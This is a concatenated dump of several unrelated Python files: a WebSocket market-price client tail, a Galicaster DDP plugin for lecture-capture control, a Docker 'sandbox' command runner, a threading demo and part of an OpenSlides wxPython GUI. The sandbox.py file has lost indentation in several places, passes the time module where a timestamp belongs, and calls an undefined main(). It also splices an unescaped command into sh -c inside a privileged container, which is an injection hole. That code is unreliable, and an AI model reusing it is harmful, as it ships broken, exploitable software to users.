        print('Usage: market_price.py [--hostname hostname] [--port port] [--app_id app_id] [--user user] [--position position] [--help]')
        sys.exit(2)
    for opt, arg in opts:
        # BUGFIX: the comparisons used `opt in ("--help")` etc. — without a
        # trailing comma those parentheses are plain strings, so `in` was a
        # substring test that only worked because getopt returns canonical
        # option names.  One-element tuples make the match exact.
        if opt in ("--help",):
            print('Usage: market_price.py [--hostname hostname] [--port port] [--app_id app_id] [--user user] [--position position] [--help]')
            sys.exit(0)
        elif opt in ("--hostname",):
            hostname = arg
        elif opt in ("--port",):
            port = arg
        elif opt in ("--app_id",):
            app_id = arg
        elif opt in ("--user",):
            user = arg
        elif opt in ("--position",):
            position = arg
    # Start websocket handshake
    ws_address = "ws://{}:{}/WebSocket".format(hostname, port)
    print("Connecting to WebSocket " + ws_address + " ...")
    web_socket_app = websocket.WebSocketApp(ws_address, header=['User-Agent: Python'],
                                            on_message=on_message,
                                            on_error=on_error,
                                            on_close=on_close,
                                            subprotocols=['tr_json2'])
    web_socket_app.on_open = on_open
    # Run the websocket event loop on a worker thread so the main thread can
    # sleep and react to Ctrl-C by closing the connection cleanly.
    wst = threading.Thread(target=web_socket_app.run_forever)
    wst.start()
    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        web_socket_app.close()
|
ddp.py | # DDP galicaster plugin
#
# Source:
# github SussexLearningSystems/peakaboo
# /docs/capture_agent_plugins/examples/galicaster_2_manchester/ddp.py
# Commit: 484abe9
#
# Copyright (c) 2016 University of Sussex
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# import calendar
import cStringIO
import requests
# import socket
from threading import Thread
import time
import uuid
from gi.repository import Gdk
from MeteorClient import MeteorClient
import pyscreenshot as ImageGrab
from PIL import Image
from galicaster.core import context
# Module-level Galicaster singletons shared by init() and the DDP thread.
conf = context.get_conf()
dispatcher = context.get_dispatcher()
logger = context.get_logger()
def init():
    """Galicaster plugin entry point: start the DDP bridge thread."""
    ddp = DDP()
    ddp.start()
class DDP(Thread):
    """Bridge between Galicaster and a Meteor server over DDP.

    Publishes this capture agent's state (recording/paused flags, VU meter
    level, screenshots, audio-stream coordinates) into the Meteor 'rooms'
    collection, and applies remote changes of that document (pause/resume,
    record/stop) to the local recorder.  This module is Python 2 only
    (cStringIO, iteritems, long, uuid4().get_hex()).
    """
    def __init__(self):
        Thread.__init__(self)
        # DDP client wiring: every Meteor event is routed to an on_* method.
        self.meteor = conf.get('ddp', 'meteor')
        self.client = MeteorClient(self.meteor, debug=False)
        self.client.on('added', self.on_added)
        self.client.on('changed', self.on_changed)
        self.client.on('subscribed', self.on_subscribed)
        self.client.on('connected', self.on_connected)
        self.client.on('removed', self.on_removed)
        self.client.on('closed', self.on_closed)
        self.client.on('logged_in', self.on_logged_in)
        self.displayName = conf.get('ddp', 'room_name')
        # VU meter scaling: dB values in [-vu_range, 0] map to 0..100.
        self.vu_min = -50
        self.vu_range = 50
        self.vu_data = 0
        self.last_vu = None
        self.ip = conf.get('ingest', 'address')
        # The ingest hostname doubles as the Mongo _id of this room document.
        self.id = conf.get('ingest', 'hostname')
        self._user = conf.get('ddp', 'user')
        self._password = conf.get('ddp', 'password')
        self._http_host = conf.get('ddp', 'http_host')
        self._audiostream_port = conf.get('audiostream', 'port') or 31337
        self.store_audio = conf.get_boolean('ddp', 'store_audio')
        self.screenshot_file = conf.get('ddp', 'existing_screenshot')
        self.high_quality = conf.get_boolean('ddp', 'hq_snapshot')
        self.paused = False
        self.recording = False
        self.currentMediaPackage = None
        self.currentProfile = None
        self.has_disconnected = False
        screen = Gdk.Screen.get_default()
        self._screen_width = screen.get_width()
        self._screen_height = screen.get_height()
        self.cardindex = None
        cam_available = conf.get(
            'ddp',
            'cam_available') or 0
        # Normalise cam_available (bool/int/string in config) to an int count.
        if cam_available in ('True', 'true', True, '1', 1):
            self.cam_available = 1
        elif cam_available in ('False', 'false', False, '0', 0):
            self.cam_available = 0
        else:
            self.cam_available = int(cam_available)
        # Getting audiostream params. either using existing audiostreaming server like icecast or the audiostream plugin
        if conf.get('ddp', 'existing_stream_host'):
            self._stream_host = conf.get('ddp', 'existing_stream_host')
        else:
            self._stream_host = self.ip
        if conf.get_int('ddp', 'existing_stream_port'):
            self._audiostream_port = conf.get_int('ddp', 'existing_stream_port')
        else:
            self._audiostream_port = conf.get_int('audiostream', 'port') or 31337
        if conf.get('ddp', 'existing_stream_key'):
            self.stream_key = conf.get('ddp', 'existing_stream_key')
        else:
            # NOTE(review): uuid4().get_hex() exists on Python 2 only.
            self.stream_key = uuid.uuid4().get_hex()
        if conf.get('ddp', 'extra_params'):
            self.extra_params_list = conf.get('ddp', 'extra_params').split(';')
        else:
            self.extra_params_list = []
        logger.info('audiostream URI: {}'.format('http://' + self._stream_host + ':' + str(self._audiostream_port) + '/' + self.stream_key))
        dispatcher.connect('init', self.on_init)
        dispatcher.connect('recorder-vumeter', self.vumeter)
        dispatcher.connect('timer-short', self.update_vu)
        dispatcher.connect('timer-short', self.heartbeat)
        dispatcher.connect('recorder-started', self.on_start_recording)
        dispatcher.connect('recorder-stopped', self.on_stop_recording)
        dispatcher.connect('recorder-status', self.on_rec_status_update)
    def run(self):
        """Thread entry point: establish the DDP connection."""
        self.connect()
    def connect(self):
        """Connect to Meteor unless the server has already closed on us."""
        if not self.has_disconnected:
            try:
                self.client.connect()
            except Exception:
                logger.warn('DDP connection failed')
    def update(self, collection, query, update):
        """Run a Mongo-style update, guarded by connection/subscription state."""
        if self.client.connected and self.subscribedTo('GalicasterControl'):
            try:
                self.client.update(
                    collection,
                    query,
                    update,
                    callback=self.update_callback)
            except Exception:
                logger.warn(
                    "Error updating document "
                    "{collection: %s, query: %s, update: %s}" %
                    (collection, query, update))
    def insert(self, collection, document):
        """Insert a document, guarded by connection/subscription state."""
        if self.client.connected and self.subscribedTo('GalicasterControl'):
            try:
                self.client.insert(
                    collection,
                    document,
                    callback=self.insert_callback)
            except Exception:
                logger.warn(
                    "Error inserting document {collection: %s, document: %s}" %
                    (collection, document))
    def heartbeat(self, element):
        """timer-short handler: refresh screenshots, or retry the connection."""
        if self.client.connected:
            self.update_images()
        else:
            self.connect()
    def on_start_recording(self, sender, id):
        """recorder-started handler: push mediapackage/profile/recording flag."""
        self.recording = True
        self.currentMediaPackage = self.media_package_metadata(id)
        self.currentProfile = conf.get_current_profile().name
        self.update(
            'rooms', {
                '_id': self.id
            }, {
                '$set': {
                    'currentMediaPackage': self.currentMediaPackage,
                    'currentProfile': self.currentProfile,
                    'recording': self.recording
                }
            })
    def on_stop_recording(self, mpid, sender=None):
        """recorder-stopped handler: clear package/profile, unset recording."""
        # NOTE(review): parameter order differs from on_start_recording(sender,
        # id) — confirm against the dispatcher's signal signature.
        self.recording = False
        self.currentMediaPackage = None
        self.currentProfile = None
        self.update(
            'rooms', {
                '_id': self.id
            }, {
                '$unset': {
                    'currentMediaPackage': '',
                    'currentProfile': ''
                }, '$set': {
                    'recording': self.recording
                }
            })
        self.update_images(1.5)
    def on_init(self, data):
        """Galicaster 'init' signal: publish a first screenshot after startup."""
        self.update_images(1.5)
    def update_images(self, delay=0.0):
        """Grab and upload a screenshot asynchronously after `delay` seconds."""
        worker = Thread(target=self._update_images, args=(delay,))
        worker.start()
    def _update_images(self, delay):
        """Worker: capture (or load) a screenshot and POST it to the HTTP host."""
        time.sleep(delay)
        files = {}
        if not self.screenshot_file:
            # take a screenshot with pyscreenshot
            im = ImageGrab.grab(bbox=(0, 0, self._screen_width, self._screen_height), backend='imagemagick')
        else:
            try:
                # used if screenshot already exists
                im = Image.open(self.screenshot_file)
            except IOError:
                logger.warn("Unable to open screenshot file {0}".format(self.screenshot_file))
                return
        output = cStringIO.StringIO()
        image_format = 'JPEG'
        if not self.high_quality:
            im.thumbnail((640, 360), Image.ANTIALIAS)
        else:
            image_format = 'PNG'
        if im.mode != "RGB":
            im = im.convert("RGB")
        im.save(output, format=image_format)  # to reduce jpeg size use param: optimize=True
        files['galicaster'] = ('galicaster.jpg', output.getvalue(),
                              'image/jpeg')
        try:
            # add verify=False for testing self signed certs
            requests.post(
                "%s/image/%s" %
                (self._http_host, self.id), files=files, auth=(
                    self._user, self._password))  # to ignore ssl verification, use param: verify=False
        except Exception:
            logger.warn('Unable to post images')
    def vumeter(self, element, data, data_chan2, vu_bool):
        """recorder-vumeter handler: clamp the dB value and rescale to 0..100."""
        if data == "Inf":
            data = 0
        else:
            if data < -self.vu_range:
                data = -self.vu_range
            elif data > 0:
                data = 0
        self.vu_data = int(((data + self.vu_range) / float(self.vu_range)) * 100)
    def update_vu(self, element):
        """timer-short handler: push the VU value only when it has changed."""
        if self.vu_data != self.last_vu:
            update = {'vumeter': self.vu_data}
            self.update('rooms', {'_id': self.id}, {'$set': update})
            self.last_vu = self.vu_data
    def on_rec_status_update(self, element, data):
        """recorder-status handler: mirror the paused flag, refresh images."""
        if data == 'paused':
            is_paused = True
        else:
            is_paused = False
        if is_paused:
            self.update_images(.75)
        # NOTE(review): this pushes only when self.paused == is_paused, i.e.
        # when the state did NOT change — looks inverted; confirm upstream.
        if self.paused == is_paused:
            self.update(
                'rooms', {
                    '_id': self.id}, {
                    '$set': {
                        'paused': is_paused}})
        self.paused = is_paused
        if data == 'recording':
            self.update_images(.75)
    def media_package_metadata(self, id):
        """Return episode + series metadata of the current mediapackage as a
        flat dict (duration in seconds; None/[] values blanked to '')."""
        mp = context.get('recorder').current_mediapackage
        line = mp.metadata_episode
        duration = mp.getDuration()
        line["duration"] = long(duration / 1000) if duration else None
        # FIXME Does series_title need sanitising as well as duration?
        # created = mp.getDate()
        # line["created"] = calendar.timegm(created.utctimetuple())
        for key, value in mp.metadata_series.iteritems():
            line["series_" + key] = value
        for key, value in line.iteritems():
            if value in [None, []]:
                line[key] = ''
        # return line
        return line
    def subscription_callback(self, error):
        """DDP subscribe callback: log failures."""
        if error:
            logger.warn("Subscription callback returned error: %s" % error)
    def insert_callback(self, error, data):
        """DDP insert callback: log failures."""
        if error:
            logger.warn("Insert callback returned error: %s" % error)
    def update_callback(self, error, data):
        """DDP update callback: log failures."""
        if error:
            logger.warn("Update callback returned error: %s" % error)
    def on_subscribed(self, subscription):
        """After subscribing to GalicasterControl, upsert this room's state."""
        if(subscription == 'GalicasterControl'):
            me = self.client.find_one('rooms')
            # Data to push when inserting or updating
            data = {
                'displayName': self.displayName,
                'ip': self.ip,
                'paused': self.paused,
                'recording': self.recording,
                'heartbeat': int(time.time()),
                'camAvailable': self.cam_available,
                'inputs': self.inputs(),
                'stream': {
                    'host': self._stream_host,
                    'port': self._audiostream_port,
                    'key': self.stream_key
                }
            }
            # Parse extra Meteor Mongodb collection elements and append
            for params in self.extra_params_list:
                param = params.split(':')
                data[param[0]] = param[1]
            if self.currentMediaPackage:
                data['currentMediaPackage'] = self.currentMediaPackage
            if self.currentProfile:
                data['currentProfile'] = self.currentProfile
            if me:
                # Items to unset
                unset = {}
                if not self.currentMediaPackage:
                    unset['currentMediaPackage'] = ''
                if not self.currentProfile:
                    unset['currentProfile'] = ''
                # Update to push
                update = {
                    '$set': data
                }
                if unset:
                    update['$unset'] = unset
                self.update('rooms', {'_id': self.id}, update)
            else:
                data['_id'] = self.id
                self.insert('rooms', data)
    def inputs(self):
        """Describe available inputs: one presentation plus labelled cameras."""
        inputs = {
            'presentations': ['Presentation']
        }
        inputs['cameras'] = []
        labels = conf.get('ddp', 'cam_labels')
        cam_labels = []
        if labels:
            cam_labels = [l.strip() for l in labels.split(',')]
        for i in range(0, self.cam_available):
            label = cam_labels[i] if i < len(
                cam_labels) else "Camera %d" % (i + 1)
            inputs['cameras'].append(label)
        return inputs
    def on_added(self, collection, id, fields):
        """DDP 'added' event: nothing to do."""
        pass
    def on_changed(self, collection, id, fields, cleared):
        """DDP 'changed' event: apply remote pause/record commands locally."""
        me = self.client.find_one('rooms')
        if self.paused != me['paused']:
            self.set_paused(me['paused'])
        if context.get('recorder').is_recording() != me['recording']:
            self.set_recording(me)
    def on_removed(self, collection, id):
        """DDP 'removed' event: attempt to re-create our room document."""
        # NOTE(review): on_subscribed(None) fails its subscription check and
        # does nothing — should this pass 'GalicasterControl'?  Confirm.
        self.on_subscribed(None)
    def set_paused(self, new_status):
        """Toggle the local pause state to match a remote request."""
        if not self.paused:
            self.paused = new_status
            context.get('recorder').pause()
        else:
            self.paused = False
            context.get('recorder').resume()
    def set_recording(self, me):
        """Start or stop the recorder to match the remote 'recording' flag."""
        self.recording = me['recording']
        if self.recording:
            # FIXME: Metadata isn't passed to recorder
            # meta = me.get('currentMediaPackage', {}) or {}
            # profile = me.get('currentProfile', 'nocam')
            # series = (meta.get('series_title', ''), meta.get('isPartOf', ''))
            # user = {'user_name': meta.get('creator', ''),
            #         'user_id': meta.get('rightsHolder', '')}
            # title = meta.get('title', 'Unknown')
            context.get('recorder').record()
        else:
            context.get('recorder').stop()
    def on_connected(self):
        """DDP 'connected' event: log in with stored credentials and token."""
        logger.info('Connected to Meteor')
        token = conf.get('ddp', 'token')
        self.client.login(self._user, self._password, token=token)
    def on_logged_in(self, data):
        """DDP 'logged_in' event: persist the session token and subscribe."""
        conf.set('ddp', 'token', data['token'])
        conf.update()
        try:
            self.client.subscribe(
                'GalicasterControl',
                params=[
                    self.id],
                callback=self.subscription_callback)
        except Exception:
            logger.warn('DDP subscription failed')
    def on_closed(self, code, reason):
        """DDP 'closed' event: stop reconnecting for good."""
        self.has_disconnected = True
        logger.error('Disconnected from Meteor: err %d - %s' % (code, reason))
    def subscribedTo(self, publication):
        """Return True if `publication` is an active DDP subscription."""
        return self.client.subscriptions.get(publication) is not None
|
sandbox.py | #!/usr/bin/python
from __future__ import print_function
import os
import shlex
import signal
import subprocess
import sys
import time
from optparse import OptionParser
from threading import Thread
try:
from Queue import Queue, Empty
except ImportError:
from queue import Queue, Empty
# Compatibility shim: on Python 3 recreate the Python 2 `unicode` builtin so
# the rest of this (Python 2-era) module runs unchanged.
if sys.version_info >= (3,):
    def unicode(s, errors="strict"):
        """Pass str through unchanged; decode bytes/bytearray as UTF-8."""
        if isinstance(s, str):
            return s
        elif isinstance(s, bytes) or isinstance(s, bytearray):
            return s.decode("utf-8", errors)
        raise SandboxError("Tried to convert unrecognized type to unicode")
class SandboxError(Exception):
    """Raised for sandbox misuse: starting a command while one is running,
    failing to launch the child process, or retrieving/releasing a live
    sandbox."""
def _guard_monitor(jail):
guard_out = jail.command_process.stdout
while True:
line = guard_out.readline()
if not line:
end_item = (time.time(), None)
jail.resp_queue.put(end_item)
jail.stdout_queue.put(end_item)
jail.stderr_queue.put(end_item)
break
line = line.rstrip("\r\n")
words = line.split(None, 2)
if len(words) < 3:
msg, ts = words
data = ""
else:
msg, ts, data = words
ts = float(ts)
data = unicode(data, errors="replace")
if msg == "STDOUT":
jail.stdout_queue.put((time, data))
elif msg == "STDERR":
jail.stderr_queue.put((time, data))
elif msg == "SIGNALED":
jail.resp_queue.put((time, data))
def _monitor_file(fd, q):
print("Start monitor")
while True:
line = fd.readline()
print(line)
if not line:
q.put(None)
break
line = unicode(line, errors="replace")
line = line.rstrip('\r\n')
q.put(line)
class Sandbox:
    """Runs one shell command at a time inside a privileged Docker container.

    The child's stdout/stderr are pumped into thread-safe queues by daemon
    monitor threads; stdin writes are serialised through `child_queue` by a
    writer thread, so callers interact only with queues and never block on
    the child's pipes directly.
    """
    def __init__(self, working_directory):
        """Initialize a new sandbox for the given working directory.
        working_directory: the directory in which the shell command should
        be launched.
        """
        self._is_alive = False
        self.command_process = None
        self.stdout_queue = Queue()
        self.stderr_queue = Queue()
        # NOTE: child_queue is created in start(); is_alive only touches it
        # after _is_alive has been set there.
        self.working_directory = working_directory
    @property
    def is_alive(self):
        """Indicates whether a command is currently running in the sandbox"""
        if self._is_alive:
            sub_result = self.command_process.poll()
            if sub_result is None:
                return True
            # Child has exited: unblock the writer thread and latch state.
            self.child_queue.put(None)
            self._is_alive = False
        return False
    def start(self, shell_command):
        """Start a command running in the sandbox"""
        # Wrap the caller's command so it executes inside the privileged
        # Docker image with the shared working path bind-mounted.
        shell_command = "docker run -v /var/www/nycsl/problems/workers/workingPath:/var/www/nycsl/problems/workers/workingPath --privileged=true virtual_machine sh -c \'" + shell_command + "\'"
        print("Shell command")
        print(shell_command)
        if self.is_alive:
            raise SandboxError("Tried to run command with one in progress.")
        working_directory = self.working_directory
        self.child_queue = Queue()
        # Normalise Windows path separators before tokenising for Popen.
        shell_command = shlex.split(shell_command.replace('\\','/'))
        try:
            self.command_process = subprocess.Popen(shell_command,
                                                    stdin=subprocess.PIPE,
                                                    stdout=subprocess.PIPE,
                                                    stderr=subprocess.PIPE,
                                                    universal_newlines=True,
                                                    cwd=working_directory)
        except OSError:
            print("There was an error")
            raise SandboxError('Failed to start {0}'.format(shell_command))
        self._is_alive = True
        # Daemon threads drain stdout/stderr so the child never blocks on
        # full pipe buffers.
        stdout_monitor = Thread(target=_monitor_file,
                                args=(self.command_process.stdout, self.stdout_queue))
        stdout_monitor.daemon = True
        stdout_monitor.start()
        stderr_monitor = Thread(target=_monitor_file,
                                args=(self.command_process.stderr, self.stderr_queue))
        stderr_monitor.daemon = True
        stderr_monitor.start()
        Thread(target=self._child_writer).start()
    def kill(self):
        """Stops the sandbox.
        Shuts down the sandbox, cleaning up any spawned processes, threads, and
        other resources. The shell command running inside the sandbox may be
        suddenly terminated.
        """
        if self.is_alive:
            try:
                self.command_process.kill()
            except OSError:
                pass
            self.command_process.wait()
            # Sentinel stops the writer thread.
            self.child_queue.put(None)
    def retrieve(self):
        """Copy the working directory back out of the sandbox."""
        # No-op here: the Docker bind mount shares the directory directly.
        if self.is_alive:
            raise SandboxError("Tried to retrieve sandbox while still alive")
        pass
    def release(self):
        """Release the sandbox for further use
        If running in a jail unlocks and releases the jail for reuse by others.
        Must be called exactly once after Sandbox.kill has been called.
        """
        if self.is_alive:
            raise SandboxError("Sandbox released while still alive")
        pass
    def pause(self):
        """Pause the process by sending a SIGSTOP to the child
        A limitation of the method is it will only pause the initial
        child process created any further (grandchild) processes created
        will not be paused.
        This method is a no-op on Windows.
        """
        try:
            self.command_process.send_signal(signal.SIGSTOP)
        except (ValueError, AttributeError, OSError):
            pass
    def resume(self):
        """Resume the process by sending a SIGCONT to the child
        This method is a no-op on Windows
        """
        try:
            self.command_process.send_signal(signal.SIGCONT)
        except (ValueError, AttributeError, OSError):
            pass
    def _child_writer(self):
        """Writer thread: forward queued strings to the child's stdin."""
        queue = self.child_queue
        stdin = self.command_process.stdin
        while True:
            ln = queue.get()
            if ln is None:
                # Sentinel from kill()/is_alive: stop writing.
                break
            try:
                stdin.write(ln)
                stdin.flush()
            except (OSError, IOError):
                # Child's stdin is gone; tear the whole sandbox down.
                self.kill()
                break
    def write(self, str):
        """Write str to stdin of the process being run"""
        # NOTE(review): the parameter shadows the builtin `str`.
        if not self.is_alive:
            return False
        self.child_queue.put(str)
    def write_line(self, line):
        """Write line to stdin of the process being run
        A newline is appended to line and written to stdin of the child process
        """
        if not self.is_alive:
            return False
        self.child_queue.put(line + "\n")
    def read_line(self, timeout=0):
        """Read line from child process
        Returns a line of the child process' stdout, if one isn't available
        within timeout seconds it returns None. Also guaranteed to return None
        at least once after each command that is run in the sandbox.
        """
        # Brief pause gives the monitor thread a chance to enqueue output.
        time.sleep(0.1)
        if not self.is_alive:
            timeout=0
        try:
            return self.stdout_queue.get(block=True, timeout=timeout)
        except Empty:
            return None
    def read_error(self, timeout=0):
        """Read line from child process' stderr
        Returns a line of the child process' stderr, if one isn't available
        within timeout seconds it returns None. Also guaranteed to return None
        at least once after each command that is run in the sandbox.
        """
        if not self.is_alive:
            timeout=0
        try:
            return self.stderr_queue.get(block=True, timeout=timeout)
        except Empty:
            return None
    def check_path(self, path, errors):
        """Append a message to `errors` and return False if `path` does not
        exist under the working directory; return True otherwise."""
        resolved_path = os.path.join(self.working_directory, path)
        if not os.path.exists(resolved_path):
            errors.append("Output file " + str(path) + " was not created.")
            return False
        else:
            return True
def get_sandbox(working_dir, secure=None):
    """Factory for a Sandbox rooted at `working_dir`.

    `secure` is accepted for API compatibility but currently ignored: every
    sandbox is the Docker-backed Sandbox.
    """
    return Sandbox(working_dir)
if __name__ == "__main__":
    # NOTE(review): main() is not defined anywhere in this module, so running
    # the file directly raises NameError — confirm whether a main() was lost
    # in this version or the guard should be removed.
    main()
|
thread_test.py | import threading
import time
from threading import current_thread
def myThread(arg1, arg2):
    """Demo worker: log the thread name, print both args, sleep, log again.

    arg1, arg2: arbitrary values echoed as "arg1 arg2".
    """
    # BUGFIX: getName is a method — the original printed the bound-method
    # object (`<bound method ...>`) instead of the thread's name.  The
    # module's final print already used getName() correctly.
    print(current_thread().getName(), 'start')
    print('%s %s' % (arg1, arg2))
    time.sleep(1)
    print(current_thread().getName(), 'stop')
# Spawn five worker threads with arguments (i, i+1) for i = 1..5.
for i in range(1, 6, 1):
    t1 = threading.Thread(target=myThread, args=(i, i+1))
    t1.start()  # start the worker thread
    # t1 = myThreayd(i, i + 1)
# Main thread finishes immediately; workers keep printing for ~1s more.
print(current_thread().getName(), 'end')
|
gui.py | from __future__ import unicode_literals
import Queue
import datetime
import errno
import gettext
import itertools
import json
import locale
import os
import subprocess
import sys
import threading
import wx
import openslides
from openslides.utils.main import (
detect_openslides_type,
filesystem2unicode,
unicode2filesystem,
get_default_user_data_path,
get_port,
PortableDirNotWritable,
)
# NOTE: djangos translation module can't be used here since it requires
# a defined settings module
# NOTE(review): ugettext/ungettext exist on Python 2 NullTranslations only
# (gettext/ngettext on Python 3) — this file targets Python 2/classic wx.
_translations = gettext.NullTranslations()
_ = lambda text: _translations.ugettext(text)
ungettext = lambda msg1, msg2, n: _translations.ungettext(msg1, msg2, n)
def get_data_path(*args):
    """Return the path of a resource inside this module's ``data`` directory,
    joining any extra path components onto it."""
    module_file = filesystem2unicode(__file__)
    base_dir = os.path.dirname(module_file)
    return os.path.join(base_dir, "data", *args)
class RunCmdEvent(wx.PyCommandEvent):
    """Event posted by RunCommandControl when the child command starts
    (running=True) or finishes (running=False, exitcode set)."""
    def __init__(self, evt_type, evt_id):
        super(RunCmdEvent, self).__init__(evt_type, evt_id)
        # True while the command is running, False once it has finished.
        self.running = False
        # Child's integer exit status once finished, else None.
        self.exitcode = None
# Custom wx event type/binder RunCommandControl uses to notify its parent
# about child-process start and exit (carried by RunCmdEvent).
EVT_RUN_CMD_ID = wx.NewEventType()
EVT_RUN_CMD = wx.PyEventBinder(EVT_RUN_CMD_ID, 1)
class RunCommandControl(wx.Panel):
    """Read-only text panel that runs ``python -u -m openslides <args>`` and
    streams the child's output into the widget.

    A reader thread pushes raw output lines into output_queue; a wx timer
    drains that queue on the GUI thread every UPDATE_INTERVAL ms and fires
    EVT_RUN_CMD events on start/exit.
    """
    # Output-poll period in milliseconds.
    UPDATE_INTERVAL = 500
    def __init__(self, parent):
        super(RunCommandControl, self).__init__(parent)
        self.child_process = None
        self.output_queue = Queue.Queue()
        self.output_read_thread = None
        self.canceled = False
        # Serialises writes to te_output between timer and append_message.
        self.output_mutex = threading.RLock()
        vbox = wx.BoxSizer(wx.VERTICAL)
        self.te_output = wx.TextCtrl(
            self, style=wx.TE_MULTILINE | wx.TE_READONLY | wx.HSCROLL)
        vbox.Add(self.te_output, 1, wx.EXPAND)
        self.update_timer = wx.Timer(self)
        self.Bind(wx.EVT_TIMER, self.on_update_timer, self.update_timer)
        self.SetSizerAndFit(vbox)
    def _read_output(self):
        """Reader thread: pump child stdout lines into output_queue."""
        while True:
            # NOTE: don't use iterator interface since it uses an
            # internal buffer and we don't see output in a timely fashion
            line = self.child_process.stdout.readline()
            if not line:
                break
            self.output_queue.put(line)
    def is_alive(self):
        """True while the child process exists and has not exited."""
        if self.child_process is None:
            return False
        return self.child_process.poll() is None
    def run_command(self, *args):
        """Spawn ``python -u -m openslides <args>`` and start streaming."""
        if self.is_alive():
            raise ValueError("already running a command")
        cmd = [sys.executable, "-u", "-m", "openslides"]
        cmd.extend(args)
        # XXX: subprocess on windows only handles byte strings
        # with python3 this will hopefully no longer be the case
        cmd = [unicode2filesystem(x) for x in cmd]
        # Own process group (win32) so the child can be signalled separately.
        creationflags = getattr(subprocess, "CREATE_NEW_PROCESS_GROUP", 0)
        self.child_process = subprocess.Popen(
            cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT, creationflags=creationflags)
        self.child_process.stdin.close()
        self.output_read_thread = threading.Thread(target=self._read_output)
        self.output_read_thread.start()
        self.update_timer.Start(self.UPDATE_INTERVAL)
        # Notify listeners that the command is now running.
        evt = RunCmdEvent(EVT_RUN_CMD_ID, self.GetId())
        evt.running = True
        self.GetEventHandler().ProcessEvent(evt)
    def cancel_command(self):
        """Forcefully stop the running command (if any)."""
        if not self.is_alive():
            return
        # TODO: try sigint first, then get more aggressive if user insists
        self.child_process.kill()
        self.canceled = True
    def on_update_timer(self, evt):
        """Timer tick: drain queued output into the widget; detect exit."""
        is_alive = self.is_alive()
        if not is_alive:
            # join thread to make sure everything was read
            self.output_read_thread.join()
            self.output_read_thread = None
        for line_no in itertools.count():
            try:
                data = self.output_queue.get(block=False)
            except Queue.Empty:
                break
            else:
                # XXX: check whether django uses utf-8 or locale for
                # it's cli output
                text = data.decode("utf-8", errors="replace")
                with self.output_mutex:
                    self.te_output.AppendText(text)
            # avoid waiting too long here if child is still alive
            if is_alive and line_no > 10:
                break
        if not is_alive:
            # Command finished: stop polling and report the exit code.
            exitcode = self.child_process.returncode
            self.update_timer.Stop()
            self.child_process = None
            evt = RunCmdEvent(EVT_RUN_CMD_ID, self.GetId())
            evt.running = False
            evt.exitcode = exitcode
            self.GetEventHandler().ProcessEvent(evt)
    def append_message(self, text, newline="\n"):
        """Append a line of text to the output control (thread-safe)."""
        with self.output_mutex:
            self.te_output.AppendText(text + newline)
class SettingsDialog(wx.Dialog):
    """Modal dialog for editing the server host and port.

    Values are exposed as string properties (`host`, `port`); validation is
    left to the caller.
    """
    def __init__(self, parent):
        super(SettingsDialog, self).__init__(parent, wx.ID_ANY, _("Settings"))
        grid = wx.GridBagSizer(5, 5)
        row = 0
        lb_host = wx.StaticText(self, label=_("&Host:"))
        grid.Add(lb_host, pos=(row, 0))
        self.tc_host = wx.TextCtrl(self)
        grid.Add(self.tc_host, pos=(row, 1), flag=wx.EXPAND)
        row += 1
        lb_port = wx.StaticText(self, label=_("&Port:"))
        grid.Add(lb_port, pos=(row, 0))
        self.tc_port = wx.TextCtrl(self)
        grid.Add(self.tc_port, pos=(row, 1), flag=wx.EXPAND)
        row += 1
        sizer = self.CreateButtonSizer(wx.OK | wx.CANCEL)
        # CreateButtonSizer may return None on some platforms/flags.
        if not sizer is None:
            grid.Add((0, 0), pos=(row, 0), span=(1, 2))
            row += 1
            grid.Add(sizer, pos=(row, 0), span=(1, 2))
        box = wx.BoxSizer(wx.VERTICAL)
        box.Add(
            grid, flag=wx.EXPAND | wx.ALL | wx.ALIGN_CENTER_VERTICAL,
            border=5, proportion=1)
        self.SetSizerAndFit(box)
    @property
    def host(self):
        # Host text exactly as entered by the user.
        return self.tc_host.GetValue()
    @host.setter
    def host(self, host):
        self.tc_host.SetValue(host)
    @property
    def port(self):
        # Port is kept as a string; callers convert/validate as needed.
        return self.tc_port.GetValue()
    @port.setter
    def port(self, port):
        self.tc_port.SetValue(port)
class BackupSettingsDialog(wx.Dialog):
    """Dialog to configure periodic database backups: enable flag,
    destination file, and an interval given as count + unit.

    Exposes `backupdb_enabled`, `backupdb_destination`, `interval` and
    `interval_unit` ("second" | "minute" | "hour") as properties.
    """
    # NOTE: keep order in sync with _update_interval_choices()
    _INTERVAL_UNITS = ["second", "minute", "hour"]
    def __init__(self, parent):
        super(BackupSettingsDialog, self).__init__(
            parent, wx.ID_ANY, _("Database backup"))
        self._interval_units = {}
        grid = wx.GridBagSizer(5, 5)
        row = 0
        self.cb_backup = wx.CheckBox(
            self, label=_("&Regularly backup database"))
        self.cb_backup.SetValue(True)
        self.cb_backup.Bind(wx.EVT_CHECKBOX, self.on_backup_checked)
        grid.Add(self.cb_backup, pos=(row, 0), span=(1, 3))
        row += 1
        lb_dest = wx.StaticText(self, label=_("&Destination:"))
        grid.Add(lb_dest, pos=(row, 0))
        style = wx.FLP_SAVE | wx.FLP_USE_TEXTCTRL
        self.fp_dest = wx.FilePickerCtrl(self, style=style)
        grid.Add(self.fp_dest, pos=(row, 1), span=(1, 2), flag=wx.EXPAND)
        row += 1
        lb_interval = wx.StaticText(self, label=_("&Every"))
        grid.Add(lb_interval, pos=(row, 0))
        self.sb_interval = wx.SpinCtrl(self, min=1, initial=1)
        # Changing the count re-pluralises the unit labels.
